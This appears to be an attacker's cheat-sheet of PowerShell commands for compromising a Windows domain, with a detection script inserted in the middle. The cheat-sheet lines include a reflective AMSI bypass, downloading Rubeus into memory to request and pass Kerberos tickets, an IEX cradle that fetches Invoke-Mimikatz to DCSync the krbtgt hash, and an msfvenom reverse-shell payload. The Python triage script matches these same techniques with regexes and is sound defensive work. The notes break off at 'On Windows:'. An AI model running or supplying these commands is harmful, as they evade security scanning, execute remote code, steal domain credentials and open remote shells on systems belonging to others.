PowerShell process injection
$xx = [Ref].Assembly.GetTypes(); Foreach($yy in $xx) {if ($yy.Name -like "*iUtils") {$vv = $yy}}; $ww = $vv.GetFields("NonPublic,Static"); Foreach ($uu in $ww) { if ($uu.Name -like "*nitFailed") {$ux = $uu}}; $ux.SetValue($null,$true)
$x = (New-Object System.Net.WebClient).downloadData('https://path/to/rubeus.exe')
$xa = [System.Reflection.Assembly]::Load($x);[Rubeus.Program]::Main("
asktgt /user:<username> /password:<password> /enctype:aes256
/domain:.local /dc:ad03.local
/createnetonly:C:\Windows\System32\cmd.exe".Split())
$xa = [System.Reflection.Assembly]::Load($x);[Rubeus.Program]::Main("
asktgt /user:<username> /password:<password> /enctype:aes256
/domain:.local /dc:..local /ptt".Split())
-- If you still have a DA shell anywhere, let's try to get krbtgt via lsass --
$xx = [Ref].Assembly.GetTypes(); Foreach($yy in $xx) {if ($yy.Name -like "*iUtils") {$vv = $yy}}; $ww = $vv.GetFields("NonPublic,Static"); Foreach ($uu in $ww) { if ($uu.Name -like "*nitFailed") {$ux = $uu}}; $ux.SetValue($null,$true)
IEX((New-Object System.Net.WebClient).downloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1'))
Invoke-Mimikatz -Command '"privilege::debug" "lsadump::dcsync /domain:.local /user:\krbtgt"'
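A defender-side counterpart to the sequence above, added here as an example and not part of the original notes: a small Python triage over constructed PowerShell script block texts (the shape of ScriptBlockText captures) that flags the reflective AMSI tampering, the in-memory assembly load, the IEX download cradle, the Rubeus asktgt call and the DCSync invocation used in this sequence. The tag names, the sample blocks and the placeholder URLs are assumptions.

```python
import re

# Constructed script-block texts in the shape of PowerShell ScriptBlockText
# (event 4104) captures. The first three reuse the commands from this page
# with the download URLs swapped for placeholders; the fourth is benign.
SAMPLE_SCRIPT_BLOCKS = [
    '$xx = [Ref].Assembly.GetTypes(); Foreach($yy in $xx) {if ($yy.Name -like "*iUtils") '
    '{$vv = $yy}}; $ww = $vv.GetFields("NonPublic,Static"); Foreach ($uu in $ww) '
    '{ if ($uu.Name -like "*nitFailed") {$ux = $uu}}; $ux.SetValue($null,$true)',
    "$x = (New-Object System.Net.WebClient).downloadData('https://PLACEHOLDER/rubeus.exe')\n"
    '$xa = [System.Reflection.Assembly]::Load($x);[Rubeus.Program]::Main("asktgt '
    '/user:u /password:p /enctype:aes256 /ptt".Split())',
    "IEX((New-Object System.Net.WebClient).downloadString('https://PLACEHOLDER/Invoke-Mimikatz.ps1'))\n"
    'Invoke-Mimikatz -Command \'"privilege::debug" "lsadump::dcsync /domain:corp.local /user:krbtgt"\'',
    "Get-ChildItem C:\\Windows\\Temp | Where-Object { $_.Length -gt 1MB } | Remove-Item",
]

# (tag, regex) pairs keyed to the techniques on this page. The AMSI pattern keys on
# the partial-name wildcards (*iUtils, *nitFailed) plus the SetValue($null,$true)
# write, so a block that never spells out the full type/field name still fires.
INDICATORS = [
    ("amsi_reflection_tamper",
     r"GetTypes\(\).*?iUtils.*?nitFailed.*?SetValue\(\s*\$null\s*,\s*\$true\s*\)"),
    ("reflective_assembly_load", r"\[System\.Reflection\.Assembly\]::Load\("),
    ("rubeus_tgt_request", r"\[Rubeus\.Program\]::Main\(.*?asktgt"),
    ("download_cradle_iex", r"\bIEX\s*\(.*?downloadString\("),
    ("mimikatz_dcsync", r"lsadump::dcsync"),
]
# DOTALL so a multi-line script block is matched as one unit.
COMPILED = [(tag, re.compile(p, re.IGNORECASE | re.DOTALL)) for tag, p in INDICATORS]


def classify(script_block):
    """Return the sorted list of indicator tags that match one script block."""
    return sorted(tag for tag, pat in COMPILED if pat.search(script_block))


def triage(blocks):
    """Return (index, tags) for each block that fired at least one indicator."""
    hits = []
    for i, block in enumerate(blocks):
        tags = classify(block)
        if tags:
            hits.append((i, tags))
    return hits


if __name__ == "__main__":
    for i, tags in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {i}: {', '.join(tags)}")
```

Script block logging has to be enabled for these texts to exist at all; the AMSI pattern is the one worth alerting on by itself, since it has no legitimate administrative use.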
Msf-venom:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.224 LPORT=8008 -f powershell
On Windows: